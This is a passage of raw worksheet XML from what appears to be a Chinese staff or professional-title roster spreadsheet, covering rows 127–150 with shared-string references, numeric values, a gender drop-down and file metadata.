        <v>41487</v>
      </c>
    </row>
    <row r="127" spans="1:10" s="73" customFormat="1" ht="23.1" customHeight="1">
      <c r="A127" s="134">
        <v>125</v>
      </c>
      <c r="B127" s="26" t="s">
        <v>516</v>
      </c>
      <c r="C127" s="8" t="s">
        <v>517</v>
      </c>
      <c r="D127" s="8" t="s">
        <v>283</v>
      </c>
      <c r="E127" s="100">
        <v>28034</v>
      </c>
      <c r="F127" s="8" t="s">
        <v>744</v>
      </c>
      <c r="G127" s="111" t="s">
        <v>199</v>
      </c>
      <c r="H127" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I127" s="8" t="s">
        <v>701</v>
      </c>
      <c r="J127" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="128" spans="1:10" s="73" customFormat="1" ht="23.1" customHeight="1">
      <c r="A128" s="134">
        <v>126</v>
      </c>
      <c r="B128" s="26" t="s">
        <v>518</v>
      </c>
      <c r="C128" s="8" t="s">
        <v>519</v>
      </c>
      <c r="D128" s="8" t="s">
        <v>283</v>
      </c>
      <c r="E128" s="100">
        <v>24746</v>
      </c>
      <c r="F128" s="8" t="s">
        <v>744</v>
      </c>
      <c r="G128" s="111" t="s">
        <v>199</v>
      </c>
      <c r="H128" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I128" s="8" t="s">
        <v>701</v>
      </c>
      <c r="J128" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="129" spans="1:10" s="73" customFormat="1" ht="23.1" customHeight="1">
      <c r="A129" s="134">
        <v>127</v>
      </c>
      <c r="B129" s="26" t="s">
        <v>520</v>
      </c>
      <c r="C129" s="8" t="s">
        <v>521</v>
      </c>
      <c r="D129" s="8" t="s">
        <v>281</v>
      </c>
      <c r="E129" s="100">
        <v>23894</v>
      </c>
      <c r="F129" s="8" t="s">
        <v>722</v>
      </c>
      <c r="G129" s="111" t="s">
        <v>199</v>
      </c>
      <c r="H129" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I129" s="8" t="s">
        <v>701</v>
      </c>
      <c r="J129" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="130" spans="1:10" s="74" customFormat="1" ht="23.1" customHeight="1">
      <c r="A130" s="134">
        <v>128</v>
      </c>
      <c r="B130" s="26" t="s">
        <v>522</v>
      </c>
      <c r="C130" s="8" t="s">
        <v>523</v>
      </c>
      <c r="D130" s="8" t="s">
        <v>281</v>
      </c>
      <c r="E130" s="75">
        <v>25873</v>
      </c>
      <c r="F130" s="8" t="s">
        <v>717</v>
      </c>
      <c r="G130" s="111" t="s">
        <v>199</v>
      </c>
      <c r="H130" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I130" s="8" t="s">
        <v>701</v>
      </c>
      <c r="J130" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="131" spans="1:10" s="76" customFormat="1" ht="23.1" customHeight="1">
      <c r="A131" s="134">
        <v>129</v>
      </c>
      <c r="B131" s="26" t="s">
        <v>524</v>
      </c>
      <c r="C131" s="8" t="s">
        <v>525</v>
      </c>
      <c r="D131" s="8" t="s">
        <v>281</v>
      </c>
      <c r="E131" s="75">
        <v>24807</v>
      </c>
      <c r="F131" s="8" t="s">
        <v>722</v>
      </c>
      <c r="G131" s="111" t="s">
        <v>199</v>
      </c>
      <c r="H131" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I131" s="8" t="s">
        <v>718</v>
      </c>
      <c r="J131" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="132" spans="1:10" s="76" customFormat="1" ht="23.1" customHeight="1">
      <c r="A132" s="134">
        <v>130</v>
      </c>
      <c r="B132" s="26" t="s">
        <v>526</v>
      </c>
      <c r="C132" s="8" t="s">
        <v>527</v>
      </c>
      <c r="D132" s="8" t="s">
        <v>281</v>
      </c>
      <c r="E132" s="75">
        <v>29768</v>
      </c>
      <c r="F132" s="8" t="s">
        <v>722</v>
      </c>
      <c r="G132" s="111" t="s">
        <v>199</v>
      </c>
      <c r="H132" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I132" s="8" t="s">
        <v>718</v>
      </c>
      <c r="J132" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="133" spans="1:10" s="76" customFormat="1" ht="23.1" customHeight="1">
      <c r="A133" s="134">
        <v>131</v>
      </c>
      <c r="B133" s="26" t="s">
        <v>522</v>
      </c>
      <c r="C133" s="8" t="s">
        <v>528</v>
      </c>
      <c r="D133" s="8" t="s">
        <v>281</v>
      </c>
      <c r="E133" s="75">
        <v>24381</v>
      </c>
      <c r="F133" s="8" t="s">
        <v>717</v>
      </c>
      <c r="G133" s="111" t="s">
        <v>199</v>
      </c>
      <c r="H133" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I133" s="8" t="s">
        <v>718</v>
      </c>
      <c r="J133" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="134" spans="1:10" s="72" customFormat="1" ht="23.1" customHeight="1">
      <c r="A134" s="134">
        <v>132</v>
      </c>
      <c r="B134" s="26" t="s">
        <v>532</v>
      </c>
      <c r="C134" s="78" t="s">
        <v>533</v>
      </c>
      <c r="D134" s="79" t="s">
        <v>283</v>
      </c>
      <c r="E134" s="81" t="s">
        <v>534</v>
      </c>
      <c r="F134" s="78" t="s">
        <v>722</v>
      </c>
      <c r="G134" s="102" t="s">
        <v>204</v>
      </c>
      <c r="H134" s="7" t="s">
        <v>375</v>
      </c>
      <c r="I134" s="78" t="s">
        <v>701</v>
      </c>
      <c r="J134" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="135" spans="1:10" s="72" customFormat="1" ht="23.1" customHeight="1">
      <c r="A135" s="134">
        <v>133</v>
      </c>
      <c r="B135" s="80" t="s">
        <v>535</v>
      </c>
      <c r="C135" s="81" t="s">
        <v>536</v>
      </c>
      <c r="D135" s="81" t="s">
        <v>281</v>
      </c>
      <c r="E135" s="81" t="s">
        <v>537</v>
      </c>
      <c r="F135" s="81" t="s">
        <v>704</v>
      </c>
      <c r="G135" s="102" t="s">
        <v>204</v>
      </c>
      <c r="H135" s="7" t="s">
        <v>375</v>
      </c>
      <c r="I135" s="78" t="s">
        <v>701</v>
      </c>
      <c r="J135" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="136" spans="1:10" s="72" customFormat="1" ht="23.1" customHeight="1">
      <c r="A136" s="134">
        <v>134</v>
      </c>
      <c r="B136" s="26" t="s">
        <v>538</v>
      </c>
      <c r="C136" s="8" t="s">
        <v>539</v>
      </c>
      <c r="D136" s="8" t="s">
        <v>681</v>
      </c>
      <c r="E136" s="69" t="s">
        <v>540</v>
      </c>
      <c r="F136" s="8" t="s">
        <v>682</v>
      </c>
      <c r="G136" s="102" t="s">
        <v>204</v>
      </c>
      <c r="H136" s="7" t="s">
        <v>375</v>
      </c>
      <c r="I136" s="78" t="s">
        <v>701</v>
      </c>
      <c r="J136" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="137" spans="1:10" s="72" customFormat="1" ht="23.1" customHeight="1">
      <c r="A137" s="134">
        <v>135</v>
      </c>
      <c r="B137" s="40" t="s">
        <v>541</v>
      </c>
      <c r="C137" s="7" t="s">
        <v>542</v>
      </c>
      <c r="D137" s="7" t="s">
        <v>283</v>
      </c>
      <c r="E137" s="7" t="s">
        <v>543</v>
      </c>
      <c r="F137" s="7" t="s">
        <v>722</v>
      </c>
      <c r="G137" s="102" t="s">
        <v>204</v>
      </c>
      <c r="H137" s="7" t="s">
        <v>375</v>
      </c>
      <c r="I137" s="7" t="s">
        <v>718</v>
      </c>
      <c r="J137" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="138" spans="1:10" s="72" customFormat="1" ht="23.1" customHeight="1">
      <c r="A138" s="134">
        <v>136</v>
      </c>
      <c r="B138" s="40" t="s">
        <v>544</v>
      </c>
      <c r="C138" s="6" t="s">
        <v>546</v>
      </c>
      <c r="D138" s="6" t="s">
        <v>686</v>
      </c>
      <c r="E138" s="7" t="s">
        <v>547</v>
      </c>
      <c r="F138" s="7" t="s">
        <v>688</v>
      </c>
      <c r="G138" s="102" t="s">
        <v>204</v>
      </c>
      <c r="H138" s="7" t="s">
        <v>375</v>
      </c>
      <c r="I138" s="7" t="s">
        <v>718</v>
      </c>
      <c r="J138" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="139" spans="1:10" s="72" customFormat="1" ht="23.1" customHeight="1">
      <c r="A139" s="134">
        <v>137</v>
      </c>
      <c r="B139" s="40" t="s">
        <v>548</v>
      </c>
      <c r="C139" s="7" t="s">
        <v>549</v>
      </c>
      <c r="D139" s="6" t="s">
        <v>681</v>
      </c>
      <c r="E139" s="7" t="s">
        <v>550</v>
      </c>
      <c r="F139" s="7" t="s">
        <v>688</v>
      </c>
      <c r="G139" s="102" t="s">
        <v>204</v>
      </c>
      <c r="H139" s="7" t="s">
        <v>375</v>
      </c>
      <c r="I139" s="7" t="s">
        <v>718</v>
      </c>
      <c r="J139" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="140" spans="1:10" s="21" customFormat="1" ht="23.1" customHeight="1">
      <c r="A140" s="134">
        <v>138</v>
      </c>
      <c r="B140" s="40" t="s">
        <v>554</v>
      </c>
      <c r="C140" s="7" t="s">
        <v>555</v>
      </c>
      <c r="D140" s="7" t="s">
        <v>283</v>
      </c>
      <c r="E140" s="7" t="s">
        <v>703</v>
      </c>
      <c r="F140" s="7" t="s">
        <v>704</v>
      </c>
      <c r="G140" s="87" t="s">
        <v>201</v>
      </c>
      <c r="H140" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I140" s="7" t="s">
        <v>701</v>
      </c>
      <c r="J140" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="141" spans="1:10" s="21" customFormat="1" ht="23.1" customHeight="1">
      <c r="A141" s="134">
        <v>139</v>
      </c>
      <c r="B141" s="40" t="s">
        <v>556</v>
      </c>
      <c r="C141" s="7" t="s">
        <v>557</v>
      </c>
      <c r="D141" s="7" t="s">
        <v>281</v>
      </c>
      <c r="E141" s="7" t="s">
        <v>775</v>
      </c>
      <c r="F141" s="7" t="s">
        <v>558</v>
      </c>
      <c r="G141" s="87" t="s">
        <v>201</v>
      </c>
      <c r="H141" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I141" s="7" t="s">
        <v>701</v>
      </c>
      <c r="J141" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="142" spans="1:10" s="21" customFormat="1" ht="23.1" customHeight="1">
      <c r="A142" s="134">
        <v>140</v>
      </c>
      <c r="B142" s="40" t="s">
        <v>559</v>
      </c>
      <c r="C142" s="7" t="s">
        <v>560</v>
      </c>
      <c r="D142" s="7" t="s">
        <v>281</v>
      </c>
      <c r="E142" s="7" t="s">
        <v>561</v>
      </c>
      <c r="F142" s="7" t="s">
        <v>562</v>
      </c>
      <c r="G142" s="87" t="s">
        <v>201</v>
      </c>
      <c r="H142" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I142" s="7" t="s">
        <v>701</v>
      </c>
      <c r="J142" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="143" spans="1:10" s="51" customFormat="1" ht="23.1" customHeight="1">
      <c r="A143" s="134">
        <v>141</v>
      </c>
      <c r="B143" s="40" t="s">
        <v>551</v>
      </c>
      <c r="C143" s="7" t="s">
        <v>563</v>
      </c>
      <c r="D143" s="7" t="s">
        <v>283</v>
      </c>
      <c r="E143" s="7" t="s">
        <v>564</v>
      </c>
      <c r="F143" s="7" t="s">
        <v>704</v>
      </c>
      <c r="G143" s="87" t="s">
        <v>201</v>
      </c>
      <c r="H143" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I143" s="7" t="s">
        <v>279</v>
      </c>
      <c r="J143" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="144" spans="1:10" s="25" customFormat="1" ht="23.1" customHeight="1">
      <c r="A144" s="134">
        <v>142</v>
      </c>
      <c r="B144" s="40" t="s">
        <v>565</v>
      </c>
      <c r="C144" s="7" t="s">
        <v>566</v>
      </c>
      <c r="D144" s="7" t="s">
        <v>283</v>
      </c>
      <c r="E144" s="7" t="s">
        <v>567</v>
      </c>
      <c r="F144" s="7" t="s">
        <v>568</v>
      </c>
      <c r="G144" s="87" t="s">
        <v>201</v>
      </c>
      <c r="H144" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I144" s="7" t="s">
        <v>718</v>
      </c>
      <c r="J144" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="145" spans="1:10" s="25" customFormat="1" ht="23.1" customHeight="1">
      <c r="A145" s="134">
        <v>143</v>
      </c>
      <c r="B145" s="40" t="s">
        <v>565</v>
      </c>
      <c r="C145" s="7" t="s">
        <v>569</v>
      </c>
      <c r="D145" s="7" t="s">
        <v>281</v>
      </c>
      <c r="E145" s="7" t="s">
        <v>570</v>
      </c>
      <c r="F145" s="7" t="s">
        <v>568</v>
      </c>
      <c r="G145" s="87" t="s">
        <v>201</v>
      </c>
      <c r="H145" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I145" s="7" t="s">
        <v>718</v>
      </c>
      <c r="J145" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="146" spans="1:10" s="21" customFormat="1" ht="23.1" customHeight="1">
      <c r="A146" s="134">
        <v>144</v>
      </c>
      <c r="B146" s="46" t="s">
        <v>571</v>
      </c>
      <c r="C146" s="8" t="s">
        <v>577</v>
      </c>
      <c r="D146" s="8" t="s">
        <v>283</v>
      </c>
      <c r="E146" s="7" t="s">
        <v>578</v>
      </c>
      <c r="F146" s="8" t="s">
        <v>717</v>
      </c>
      <c r="G146" s="87" t="s">
        <v>380</v>
      </c>
      <c r="H146" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I146" s="8" t="s">
        <v>718</v>
      </c>
      <c r="J146" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="147" spans="1:10" s="82" customFormat="1" ht="23.1" customHeight="1">
      <c r="A147" s="134">
        <v>145</v>
      </c>
      <c r="B147" s="26" t="s">
        <v>579</v>
      </c>
      <c r="C147" s="8" t="s">
        <v>580</v>
      </c>
      <c r="D147" s="8" t="s">
        <v>686</v>
      </c>
      <c r="E147" s="7" t="s">
        <v>581</v>
      </c>
      <c r="F147" s="8" t="s">
        <v>582</v>
      </c>
      <c r="G147" s="87" t="s">
        <v>380</v>
      </c>
      <c r="H147" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I147" s="8" t="s">
        <v>683</v>
      </c>
      <c r="J147" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="148" spans="1:10" s="51" customFormat="1" ht="23.1" customHeight="1">
      <c r="A148" s="134">
        <v>146</v>
      </c>
      <c r="B148" s="26" t="s">
        <v>579</v>
      </c>
      <c r="C148" s="8" t="s">
        <v>583</v>
      </c>
      <c r="D148" s="8" t="s">
        <v>681</v>
      </c>
      <c r="E148" s="7" t="s">
        <v>584</v>
      </c>
      <c r="F148" s="8" t="s">
        <v>582</v>
      </c>
      <c r="G148" s="87" t="s">
        <v>380</v>
      </c>
      <c r="H148" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I148" s="8" t="s">
        <v>683</v>
      </c>
      <c r="J148" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="149" spans="1:10" s="73" customFormat="1" ht="23.1" customHeight="1">
      <c r="A149" s="134">
        <v>147</v>
      </c>
      <c r="B149" s="83" t="s">
        <v>585</v>
      </c>
      <c r="C149" s="38" t="s">
        <v>586</v>
      </c>
      <c r="D149" s="84" t="s">
        <v>681</v>
      </c>
      <c r="E149" s="39" t="s">
        <v>587</v>
      </c>
      <c r="F149" s="112" t="s">
        <v>588</v>
      </c>
      <c r="G149" s="87" t="s">
        <v>380</v>
      </c>
      <c r="H149" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I149" s="113" t="s">
        <v>589</v>
      </c>
      <c r="J149" s="135">
        <v>41487</v>
      </c>
    </row>
    <row r="150" spans="1:10" s="86" customFormat="1" ht="23.1" customHeight="1">
      <c r="A150" s="134">
        <v>148</v>
      </c>
      <c r="B150" s="53" t="s">
        <v>590</v>
      </c>
      <c r="C150" s="54" t="s">
        <v>591</v>
      </c>
      <c r="D150" s="54" t="s">
        <v>283</v>
      </c>
      <c r="E150" s="85" t="s">
        <v>592</v>
      </c>
      <c r="F150" s="54" t="s">
        <v>593</v>
      </c>
      <c r="G150" s="87" t="s">
        <v>380</v>
      </c>
      <c r="H150" s="87" t="s">
        <v>375</v>
      </c>
      <c r="I150" s="111" t="s">
        <v>683</v>
      </c>
      <c r="J150" s="135">
        <v>41487</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:J1"/>
  </mergeCells>
  <phoneticPr fontId="2" type="noConversion"/>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="D115">
      <formula1>"男,女"</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="1.1811023622047245" right="0.55118110236220474" top="0.59055118110236227" bottom="0.59055118110236227" header="0.51181102362204722" footer="0.51181102362204722"/>
  <pageSetup paperSize="9" orientation="landscape" horizontalDpi="200" verticalDpi="200" r:id="rId1"/>
  <headerFooter alignWithMargins="0">
    <oddFooter>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ASRQNO</vt:lpstr>
      <vt:lpstr>POMYRPQISRPRWQYZOP</vt:lpstr>
      <vt:lpstr>OIOWJPOIELRKRZMFRN</vt:lpstr>
      <vt:lpstr>TZMQLDLMSQTVPN</vt:lpstr>
      <vt:lpstr>正高</vt:lpstr>
      <vt:lpstr>农业</vt:lpstr>
      <vt:lpstr>畜牧</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lastPrinted>2013-09-27T02:08:14Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-05-28T06:52:56Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-16T03:51:25Z</dcterms:modified>
</cp:coreProperties>
</file>